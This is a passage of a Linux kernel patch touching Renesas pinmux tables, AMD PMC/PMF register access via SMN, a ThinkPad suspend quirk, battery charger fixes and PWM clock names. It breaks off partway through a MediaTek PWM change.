+ 	PINMUX_IPSR_GPSR(IP1SR7_7_4,	AVB0_TXCREFCLK),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_11_8,	AVB0_MAGIC,		SEL_AVB0_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_11_8,	AVB0_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_TD0,		SEL_AVB0_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_15_12,	AVB0_MII_TD0,		SEL_AVB0_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_TD0),
++	PINMUX_IPSR_GPSR(IP1SR7_15_12,	AVB0_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_RD2),
+ 	PINMUX_IPSR_GPSR(IP1SR7_19_16,	AVB0_MII_RD2),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_23_20,	AVB0_MDC,		SEL_AVB0_MDC_1),
++	PINMUX_IPSR_GPSR(IP1SR7_23_20,	AVB0_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR7_27_24,	AVB0_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_TXC,		SEL_AVB0_TXC_1),
+-	PINMUX_IPSR_MSEL(IP1SR7_31_28,	AVB0_MII_TXC,		SEL_AVB0_TXC_0),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR7_31_28,	AVB0_MII_TXC),
+ 
+ 	/* IP2SR7 */
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_TX_CTL,		SEL_AVB0_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP2SR7_3_0,	AVB0_MII_TX_EN,		SEL_AVB0_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR7_3_0,	AVB0_MII_TX_EN),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_RD1),
+ 	PINMUX_IPSR_GPSR(IP2SR7_7_4,	AVB0_MII_RD1),
+@@ -3419,6 +3450,82 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 		IP3SR3_7_4
+ 		IP3SR3_3_0))
+ 	},
++	{ PINMUX_CFG_REG_VAR("IP0SR4", 0xE6060060, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR4_31_28
++		IP0SR4_27_24
++		IP0SR4_23_20
++		IP0SR4_19_16
++		IP0SR4_15_12
++		IP0SR4_11_8
++		IP0SR4_7_4
++		IP0SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR4", 0xE6060064, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR4_31_28
++		IP1SR4_27_24
++		IP1SR4_23_20
++		IP1SR4_19_16
++		IP1SR4_15_12
++		IP1SR4_11_8
++		IP1SR4_7_4
++		IP1SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR4", 0xE6060068, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP2SR4_31_28
++		IP2SR4_27_24
++		IP2SR4_23_20
++		IP2SR4_19_16
++		IP2SR4_15_12
++		IP2SR4_11_8
++		IP2SR4_7_4
++		IP2SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP3SR4", 0xE606006C, 32,
++			     GROUP(-28, 4),
++			     GROUP(
++		/* IP3SR4_31_4 RESERVED */
++		IP3SR4_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP0SR5", 0xE6060860, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP0SR5_31_28
++		IP0SR5_27_24
++		IP0SR5_23_20
++		IP0SR5_19_16
++		IP0SR5_15_12
++		IP0SR5_11_8
++		IP0SR5_7_4
++		IP0SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP1SR5", 0xE6060864, 32,
++			     GROUP(4, 4, 4, 4, 4, 4, 4, 4),
++			     GROUP(
++		IP1SR5_31_28
++		IP1SR5_27_24
++		IP1SR5_23_20
++		IP1SR5_19_16
++		IP1SR5_15_12
++		IP1SR5_11_8
++		IP1SR5_7_4
++		IP1SR5_3_0))
++	},
++	{ PINMUX_CFG_REG_VAR("IP2SR5", 0xE6060868, 32,
++			     GROUP(-12, 4, 4, 4, 4, 4),
++			     GROUP(
++		/* IP2SR5_31_20 RESERVED */
++		IP2SR5_19_16
++		IP2SR5_15_12
++		IP2SR5_11_8
++		IP2SR5_7_4
++		IP2SR5_3_0))
++	},
+ 	{ PINMUX_CFG_REG("IP0SR6", 0xE6061060, 32, 4, GROUP(
+ 		IP0SR6_31_28
+ 		IP0SR6_27_24
+@@ -3505,95 +3612,6 @@ static const struct pinmux_cfg_reg pinmux_config_regs[] = {
+ 
+ #define F_(x, y)	x,
+ #define FM(x)		FN_##x,
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL4", 0xE6060100, 32,
+-			     GROUP(-12, 1, 1, -2, 1, 1, -1, 1, -2, 1, 1, -2, 1,
+-				   -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL4_19
+-		MOD_SEL4_18
+-		/* RESERVED 17-16 */
+-		MOD_SEL4_15
+-		MOD_SEL4_14
+-		/* RESERVED 13 */
+-		MOD_SEL4_12
+-		/* RESERVED 11-10 */
+-		MOD_SEL4_9
+-		MOD_SEL4_8
+-		/* RESERVED 7-6 */
+-		MOD_SEL4_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL4_2
+-		MOD_SEL4_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL5", 0xE6060900, 32,
+-			     GROUP(-12, 1, -2, 1, 1, -2, 1, 1, -2, 1, -1,
+-				   1, 1, -2, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-20 */
+-		MOD_SEL5_19
+-		/* RESERVED 18-17 */
+-		MOD_SEL5_16
+-		MOD_SEL5_15
+-		/* RESERVED 14-13 */
+-		MOD_SEL5_12
+-		MOD_SEL5_11
+-		/* RESERVED 10-9 */
+-		MOD_SEL5_8
+-		/* RESERVED 7 */
+-		MOD_SEL5_6
+-		MOD_SEL5_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL5_2
+-		/* RESERVED 1 */
+-		MOD_SEL5_0))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL6", 0xE6061100, 32,
+-			     GROUP(-13, 1, -1, 1, -2, 1, 1,
+-				   -1, 1, -2, 1, 1, 1, -2, 1, 1, -1),
+-			     GROUP(
+-		/* RESERVED 31-19 */
+-		MOD_SEL6_18
+-		/* RESERVED 17 */
+-		MOD_SEL6_16
+-		/* RESERVED 15-14 */
+-		MOD_SEL6_13
+-		MOD_SEL6_12
+-		/* RESERVED 11 */
+-		MOD_SEL6_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL6_7
+-		MOD_SEL6_6
+-		MOD_SEL6_5
+-		/* RESERVED 4-3 */
+-		MOD_SEL6_2
+-		MOD_SEL6_1
+-		/* RESERVED 0 */
+-		))
+-	},
+-	{ PINMUX_CFG_REG_VAR("MOD_SEL7", 0xE6061900, 32,
+-			     GROUP(-15, 1, 1, -1, 1, -1, 1, 1, -2, 1, 1,
+-				   -2, 1, 1, -1, 1),
+-			     GROUP(
+-		/* RESERVED 31-17 */
+-		MOD_SEL7_16
+-		MOD_SEL7_15
+-		/* RESERVED 14 */
+-		MOD_SEL7_13
+-		/* RESERVED 12 */
+-		MOD_SEL7_11
+-		MOD_SEL7_10
+-		/* RESERVED 9-8 */
+-		MOD_SEL7_7
+-		MOD_SEL7_6
+-		/* RESERVED 5-4 */
+-		MOD_SEL7_3
+-		MOD_SEL7_2
+-		/* RESERVED 1 */
+-		MOD_SEL7_0))
+-	},
+ 	{ PINMUX_CFG_REG_VAR("MOD_SEL8", 0xE6068100, 32,
+ 			     GROUP(-20, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1),
+ 			     GROUP(
+diff --git a/drivers/platform/chrome/cros_typec_switch.c b/drivers/platform/chrome/cros_typec_switch.c
+index a26219e97c931..26af51952f7f1 100644
+--- a/drivers/platform/chrome/cros_typec_switch.c
++++ b/drivers/platform/chrome/cros_typec_switch.c
+@@ -268,6 +268,7 @@ static int cros_typec_register_switches(struct cros_typec_switch_data *sdata)
+ 
+ 	return 0;
+ err_switch:
++	fwnode_handle_put(fwnode);
+ 	cros_typec_unregister_switches(sdata);
+ 	return ret;
+ }
+diff --git a/drivers/platform/x86/amd/Kconfig b/drivers/platform/x86/amd/Kconfig
+index 2ce8cb2170dfc..d9685aef0887d 100644
+--- a/drivers/platform/x86/amd/Kconfig
++++ b/drivers/platform/x86/amd/Kconfig
+@@ -7,7 +7,7 @@ source "drivers/platform/x86/amd/pmf/Kconfig"
+ 
+ config AMD_PMC
+ 	tristate "AMD SoC PMC driver"
+-	depends on ACPI && PCI && RTC_CLASS
++	depends on ACPI && PCI && RTC_CLASS && AMD_NB
+ 	select SERIO
+ 	help
+ 	  The driver provides support for AMD Power Management Controller
+diff --git a/drivers/platform/x86/amd/pmc.c b/drivers/platform/x86/amd/pmc.c
+index 3cbb01ec10e32..45b0050dfbf7b 100644
+--- a/drivers/platform/x86/amd/pmc.c
++++ b/drivers/platform/x86/amd/pmc.c
+@@ -10,6 +10,7 @@
+ 
+ #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+ 
++#include <asm/amd_nb.h>
+ #include <linux/acpi.h>
+ #include <linux/bitfield.h>
+ #include <linux/bits.h>
+@@ -37,8 +38,6 @@
+ #define AMD_PMC_SCRATCH_REG_YC		0xD14
+ 
+ /* STB Registers */
+-#define AMD_PMC_STB_INDEX_ADDRESS	0xF8
+-#define AMD_PMC_STB_INDEX_DATA		0xFC
+ #define AMD_PMC_STB_PMI_0		0x03E30600
+ #define AMD_PMC_STB_S2IDLE_PREPARE	0xC6000001
+ #define AMD_PMC_STB_S2IDLE_RESTORE	0xC6000002
+@@ -55,8 +54,6 @@
+ #define S2D_TELEMETRY_DRAMBYTES_MAX	0x1000000
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMC_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMC_SMU_INDEX_DATA		0xBC
+ #define AMD_PMC_MAPPING_SIZE		0x01000
+ #define AMD_PMC_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMC_BASE_ADDR_LO		0x13B102E8
+@@ -314,33 +311,6 @@ static int amd_pmc_setup_smu_logging(struct amd_pmc_dev *dev)
+ 	return 0;
+ }
+ 
+-static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
+-				 struct seq_file *s)
+-{
+-	u32 val;
+-
+-	switch (pdev->cpu_id) {
+-	case AMD_CPU_ID_CZN:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
+-		break;
+-	case AMD_CPU_ID_YC:
+-	case AMD_CPU_ID_CB:
+-	case AMD_CPU_ID_PS:
+-		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
+-		break;
+-	default:
+-		return -EINVAL;
+-	}
+-
+-	if (dev)
+-		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
+-
+-	if (s)
+-		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+-
+-	return 0;
+-}
+-
+ static int get_metrics_table(struct amd_pmc_dev *pdev, struct smu_metrics *table)
+ {
+ 	if (!pdev->smu_virt_addr) {
+@@ -377,6 +347,9 @@ static int amd_pmc_get_smu_version(struct amd_pmc_dev *dev)
+ 	int rc;
+ 	u32 val;
+ 
++	if (dev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
+ 	rc = amd_pmc_send_cmd(dev, 0, &val, SMU_MSG_GETSMUVERSION, 1);
+ 	if (rc)
+ 		return rc;
+@@ -423,12 +396,31 @@ static ssize_t smu_program_show(struct device *d, struct device_attribute *attr,
+ static DEVICE_ATTR_RO(smu_fw_version);
+ static DEVICE_ATTR_RO(smu_program);
+ 
++static umode_t pmc_attr_is_visible(struct kobject *kobj, struct attribute *attr, int idx)
++{
++	struct device *dev = kobj_to_dev(kobj);
++	struct amd_pmc_dev *pdev = dev_get_drvdata(dev);
++
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return 0;
++	return 0444;
++}
++
+ static struct attribute *pmc_attrs[] = {
+ 	&dev_attr_smu_fw_version.attr,
+ 	&dev_attr_smu_program.attr,
+ 	NULL,
+ };
+-ATTRIBUTE_GROUPS(pmc);
++
++static struct attribute_group pmc_attr_group = {
++	.attrs = pmc_attrs,
++	.is_visible = pmc_attr_is_visible,
++};
++
++static const struct attribute_group *pmc_groups[] = {
++	&pmc_attr_group,
++	NULL,
++};
+ 
+ static int smu_fw_info_show(struct seq_file *s, void *unused)
+ {
+@@ -495,28 +487,47 @@ static int s0ix_stats_show(struct seq_file *s, void *unused)
+ }
+ DEFINE_SHOW_ATTRIBUTE(s0ix_stats);
+ 
+-static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++static int amd_pmc_idlemask_read(struct amd_pmc_dev *pdev, struct device *dev,
++				 struct seq_file *s)
+ {
+-	struct amd_pmc_dev *dev = s->private;
++	u32 val;
+ 	int rc;
+ 
+-	/* we haven't yet read SMU version */
+-	if (!dev->major) {
+-		rc = amd_pmc_get_smu_version(dev);
+-		if (rc)
+-			return rc;
++	switch (pdev->cpu_id) {
++	case AMD_CPU_ID_CZN:
++		/* we haven't yet read SMU version */
++		if (!pdev->major) {
++			rc = amd_pmc_get_smu_version(pdev);
++			if (rc)
++				return rc;
++		}
++		if (pdev->major > 56 || (pdev->major >= 55 && pdev->minor >= 37))
++			val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_CZN);
++		else
++			return -EINVAL;
++		break;
++	case AMD_CPU_ID_YC:
++	case AMD_CPU_ID_CB:
++	case AMD_CPU_ID_PS:
++		val = amd_pmc_reg_read(pdev, AMD_PMC_SCRATCH_REG_YC);
++		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+-	if (dev->major > 56 || (dev->major >= 55 && dev->minor >= 37)) {
+-		rc = amd_pmc_idlemask_read(dev, NULL, s);
+-		if (rc)
+-			return rc;
+-	} else {
+-		seq_puts(s, "Unsupported SMU version for Idlemask\n");
+-	}
++	if (dev)
++		dev_dbg(pdev->dev, "SMU idlemask s0i3: 0x%x\n", val);
++
++	if (s)
++		seq_printf(s, "SMU idlemask : 0x%x\n", val);
+ 
+ 	return 0;
+ }
++
++static int amd_pmc_idlemask_show(struct seq_file *s, void *unused)
++{
++	return amd_pmc_idlemask_read(s->private, NULL, s);
++}
+ DEFINE_SHOW_ATTRIBUTE(amd_pmc_idlemask);
+ 
+ static void amd_pmc_dbgfs_unregister(struct amd_pmc_dev *dev)
+@@ -787,6 +798,14 @@ static void amd_pmc_s2idle_check(void)
+ 		dev_err(pdev->dev, "error writing to STB: %d\n", rc);
+ }
+ 
++static int amd_pmc_dump_data(struct amd_pmc_dev *pdev)
++{
++	if (pdev->cpu_id == AMD_CPU_ID_PCO)
++		return -ENODEV;
++
++	return amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++}
++
+ static void amd_pmc_s2idle_restore(void)
+ {
+ 	struct amd_pmc_dev *pdev = &pmc;
+@@ -799,7 +818,7 @@ static void amd_pmc_s2idle_restore(void)
+ 		dev_err(pdev->dev, "resume failed: %d\n", rc);
+ 
+ 	/* Let SMU know that we are looking for stats */
+-	amd_pmc_send_cmd(pdev, 0, NULL, SMU_MSG_LOG_DUMP_DATA, 0);
++	amd_pmc_dump_data(pdev);
+ 
+ 	rc = amd_pmc_write_stb(pdev, AMD_PMC_STB_S2IDLE_RESTORE);
+ 	if (rc)
+@@ -880,17 +899,9 @@ static int amd_pmc_write_stb(struct amd_pmc_dev *dev, u32 data)
+ {
+ 	int err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
++	err = amd_smn_write(0, AMD_PMC_STB_PMI_0, data);
+ 	if (err) {
+-		dev_err(dev->dev, "failed to write addr in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, data);
+-	if (err) {
+-		dev_err(dev->dev, "failed to write data in stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_DATA);
++		dev_err(dev->dev, "failed to write data in stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+@@ -902,18 +913,10 @@ static int amd_pmc_read_stb(struct amd_pmc_dev *dev, u32 *buf)
+ {
+ 	int i, err;
+ 
+-	err = pci_write_config_dword(dev->rdev, AMD_PMC_STB_INDEX_ADDRESS, AMD_PMC_STB_PMI_0);
+-	if (err) {
+-		dev_err(dev->dev, "error writing addr to stb: 0x%X\n",
+-			AMD_PMC_STB_INDEX_ADDRESS);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+ 	for (i = 0; i < FIFO_SIZE; i++) {
+-		err = pci_read_config_dword(dev->rdev, AMD_PMC_STB_INDEX_DATA, buf++);
++		err = amd_smn_read(0, AMD_PMC_STB_PMI_0, buf++);
+ 		if (err) {
+-			dev_err(dev->dev, "error reading data from stb: 0x%X\n",
+-				AMD_PMC_STB_INDEX_DATA);
++			dev_err(dev->dev, "error reading data from stb: 0x%X\n", AMD_PMC_STB_PMI_0);
+ 			return pcibios_err_to_errno(err);
+ 		}
+ 	}
+@@ -940,30 +943,18 @@ static int amd_pmc_probe(struct platform_device *pdev)
+ 
+ 	dev->cpu_id = rdev->device;
+ 	dev->rdev = rdev;
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_LO);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMC_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMC_SMU_INDEX_ADDRESS, AMD_PMC_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMC_SMU_INDEX_ADDRESS);
+-		err = pcibios_err_to_errno(err);
+-		goto err_pci_dev_put;
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMC_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMC_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error reading 0x%x\n", AMD_PMC_BASE_ADDR_HI);
+ 		err = pcibios_err_to_errno(err);
+ 		goto err_pci_dev_put;
+ 	}
+diff --git a/drivers/platform/x86/amd/pmf/Kconfig b/drivers/platform/x86/amd/pmf/Kconfig
+index 6d89528c31779..d87986adf91e1 100644
+--- a/drivers/platform/x86/amd/pmf/Kconfig
++++ b/drivers/platform/x86/amd/pmf/Kconfig
+@@ -7,6 +7,7 @@ config AMD_PMF
+ 	tristate "AMD Platform Management Framework"
+ 	depends on ACPI && PCI
+ 	depends on POWER_SUPPLY
++	depends on AMD_NB
+ 	select ACPI_PLATFORM_PROFILE
+ 	help
+ 	  This driver provides support for the AMD Platform Management Framework.
+diff --git a/drivers/platform/x86/amd/pmf/core.c b/drivers/platform/x86/amd/pmf/core.c
+index da23639071d79..0acc0b6221290 100644
+--- a/drivers/platform/x86/amd/pmf/core.c
++++ b/drivers/platform/x86/amd/pmf/core.c
+@@ -8,6 +8,7 @@
+  * Author: Shyam Sundar S K <Shyam-sundar.S-k@amd.com>
+  */
+ 
++#include <asm/amd_nb.h>
+ #include <linux/debugfs.h>
+ #include <linux/iopoll.h>
+ #include <linux/module.h>
+@@ -22,8 +23,6 @@
+ #define AMD_PMF_REGISTER_ARGUMENT	0xA58
+ 
+ /* Base address of SMU for mapping physical address to virtual address */
+-#define AMD_PMF_SMU_INDEX_ADDRESS	0xB8
+-#define AMD_PMF_SMU_INDEX_DATA		0xBC
+ #define AMD_PMF_MAPPING_SIZE		0x01000
+ #define AMD_PMF_BASE_ADDR_OFFSET	0x10000
+ #define AMD_PMF_BASE_ADDR_LO		0x13B102E8
+@@ -348,30 +347,19 @@ static int amd_pmf_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	dev->cpu_id = rdev->device;
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_LO);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+ 
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_LO, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_LO);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+ 
+ 	base_addr_lo = val & AMD_PMF_BASE_ADDR_HI_MASK;
+ 
+-	err = pci_write_config_dword(rdev, AMD_PMF_SMU_INDEX_ADDRESS, AMD_PMF_BASE_ADDR_HI);
+-	if (err) {
+-		dev_err(dev->dev, "error writing to 0x%x\n", AMD_PMF_SMU_INDEX_ADDRESS);
+-		pci_dev_put(rdev);
+-		return pcibios_err_to_errno(err);
+-	}
+-
+-	err = pci_read_config_dword(rdev, AMD_PMF_SMU_INDEX_DATA, &val);
++	err = amd_smn_read(0, AMD_PMF_BASE_ADDR_HI, &val);
+ 	if (err) {
++		dev_err(dev->dev, "error in reading from 0x%x\n", AMD_PMF_BASE_ADDR_HI);
+ 		pci_dev_put(rdev);
+ 		return pcibios_err_to_errno(err);
+ 	}
+diff --git a/drivers/platform/x86/thinkpad_acpi.c b/drivers/platform/x86/thinkpad_acpi.c
+index 32c10457399e4..7191ff2625b1e 100644
+--- a/drivers/platform/x86/thinkpad_acpi.c
++++ b/drivers/platform/x86/thinkpad_acpi.c
+@@ -4478,6 +4478,14 @@ static const struct dmi_system_id fwbug_list[] __initconst = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "20UH"),
+ 		}
+ 	},
++	{
++		.ident = "T14s Gen1 AMD",
++		.driver_data = &quirk_s2idle_bug,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "20UJ"),
++		}
++	},
+ 	{
+ 		.ident = "P14s Gen1 AMD",
+ 		.driver_data = &quirk_s2idle_bug,
+diff --git a/drivers/power/supply/generic-adc-battery.c b/drivers/power/supply/generic-adc-battery.c
+index 66039c665dd1e..0af536f4932f1 100644
+--- a/drivers/power/supply/generic-adc-battery.c
++++ b/drivers/power/supply/generic-adc-battery.c
+@@ -135,6 +135,9 @@ static int read_channel(struct gab *adc_bat, enum power_supply_property psp,
+ 			result);
+ 	if (ret < 0)
+ 		pr_err("read channel error\n");
++	else
++		*result *= 1000;
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/power/supply/rk817_charger.c b/drivers/power/supply/rk817_charger.c
+index 36f807b5ec442..f1b431aa0e4f2 100644
+--- a/drivers/power/supply/rk817_charger.c
++++ b/drivers/power/supply/rk817_charger.c
+@@ -335,6 +335,20 @@ static int rk817_bat_calib_cap(struct rk817_charger *charger)
+ 			charger->fcc_mah * 1000);
+ 	}
+ 
++	/*
++	 * Set the SOC to 0 if we are below the minimum system voltage.
++	 */
++	if (volt_avg <= charger->bat_voltage_min_design_uv) {
++		charger->soc = 0;
++		charge_now_adc = CHARGE_TO_ADC(0, charger->res_div);
++		put_unaligned_be32(charge_now_adc, bulk_reg);
++		regmap_bulk_write(rk808->regmap,
++				  RK817_GAS_GAUGE_Q_INIT_H3, bulk_reg, 4);
++		dev_warn(charger->dev,
++			 "Battery voltage %d below minimum voltage %d\n",
++			 volt_avg, charger->bat_voltage_min_design_uv);
+	}
++
+ 	rk817_record_battery_nvram_values(charger);
+ 
+ 	return 0;
+@@ -710,9 +724,10 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 
+ 	/*
+ 	 * Read the nvram for state of charge. Sanity check for values greater
+-	 * than 100 (10000). If the value is off it should get corrected
+-	 * automatically when the voltage drops to the min (soc is 0) or when
+-	 * the battery is full (soc is 100).
++	 * than 100 (10000) or less than 0, because other things (BSP kernels,
++	 * U-Boot, or even i2cset) can write to this register. If the value is
++	 * off it should get corrected automatically when the voltage drops to
++	 * the min (soc is 0) or when the battery is full (soc is 100).
+ 	 */
+ 	ret = regmap_bulk_read(charger->rk808->regmap,
+ 			       RK817_GAS_GAUGE_BAT_R1, bulk_reg, 3);
+@@ -721,6 +736,8 @@ static int rk817_read_battery_nvram_values(struct rk817_charger *charger)
+ 	charger->soc = get_unaligned_le24(bulk_reg);
+ 	if (charger->soc > 10000)
+ 		charger->soc = 10000;
++	if (charger->soc < 0)
++		charger->soc = 0;
+ 
+ 	return 0;
+ }
+@@ -731,8 +748,8 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ {
+ 	struct rk808 *rk808 = charger->rk808;
+ 	u8 bulk_reg[4];
+-	u32 boot_voltage, boot_charge_mah, tmp;
+-	int ret, reg, off_time;
++	u32 boot_voltage, boot_charge_mah;
++	int ret, reg, off_time, tmp;
+ 	bool first_boot;
+ 
+ 	/*
+@@ -785,10 +802,12 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		regmap_bulk_read(rk808->regmap, RK817_GAS_GAUGE_Q_PRES_H3,
+ 				 bulk_reg, 4);
+ 		tmp = get_unaligned_be32(bulk_reg);
++		if (tmp < 0)
++			tmp = 0;
+ 		boot_charge_mah = ADC_TO_CHARGE_UAH(tmp,
+ 						    charger->res_div) / 1000;
+ 		/*
+-		 * Check if the columb counter has been off for more than 300
++		 * Check if the coulomb counter has been off for more than 30
+ 		 * minutes as it tends to drift downward. If so, re-init soc
+ 		 * with the boot voltage instead. Note the unit values for the
+ 		 * OFF_CNT register appear to be in decaminutes and stops
+@@ -799,7 +818,7 @@ rk817_read_or_set_full_charge_on_boot(struct rk817_charger *charger,
+ 		 * than 0 on a reboot anyway.
+ 		 */
+ 		regmap_read(rk808->regmap, RK817_GAS_GAUGE_OFF_CNT, &off_time);
+-		if (off_time >= 30) {
++		if (off_time >= 3) {
+ 			regmap_bulk_read(rk808->regmap,
+ 					 RK817_GAS_GAUGE_PWRON_VOL_H,
+ 					 bulk_reg, 2);
+diff --git a/drivers/pwm/pwm-meson.c b/drivers/pwm/pwm-meson.c
+index 5cd7b90872c62..5732300eb0046 100644
+--- a/drivers/pwm/pwm-meson.c
++++ b/drivers/pwm/pwm-meson.c
+@@ -418,7 +418,7 @@ static const struct meson_pwm_data pwm_axg_ee_data = {
+ };
+ 
+ static const char * const pwm_axg_ao_parent_names[] = {
+-	"aoclk81", "xtal", "fclk_div4", "fclk_div5"
++	"xtal", "axg_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_axg_ao_data = {
+@@ -427,7 +427,7 @@ static const struct meson_pwm_data pwm_axg_ao_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_ab_parent_names[] = {
+-	"xtal", "aoclk81", "fclk_div4", "fclk_div5"
++	"xtal", "g12a_ao_clk81", "fclk_div4", "fclk_div5"
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+@@ -436,7 +436,7 @@ static const struct meson_pwm_data pwm_g12a_ao_ab_data = {
+ };
+ 
+ static const char * const pwm_g12a_ao_cd_parent_names[] = {
+-	"xtal", "aoclk81",
++	"xtal", "g12a_ao_clk81",
+ };
+ 
+ static const struct meson_pwm_data pwm_g12a_ao_cd_data = {
+diff --git a/drivers/pwm/pwm-mtk-disp.c b/drivers/pwm/pwm-mtk-disp.c
+index 692a06121b286..fe9593f968eeb 100644
+--- a/drivers/pwm/pwm-mtk-disp.c
++++ b/drivers/pwm/pwm-mtk-disp.c
+@@ -138,6 +138,19 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 	high_width = mul_u64_u64_div_u64(state->duty_cycle, rate, div);
+ 	value = period | (high_width << PWM_HIGH_WIDTH_SHIFT);
+ 
++	if (mdp->data->bls_debug && !mdp->data->has_commit) {
++		/*
++		 * For MT2701, disable double buffer before writing register
++		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
++		 */
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
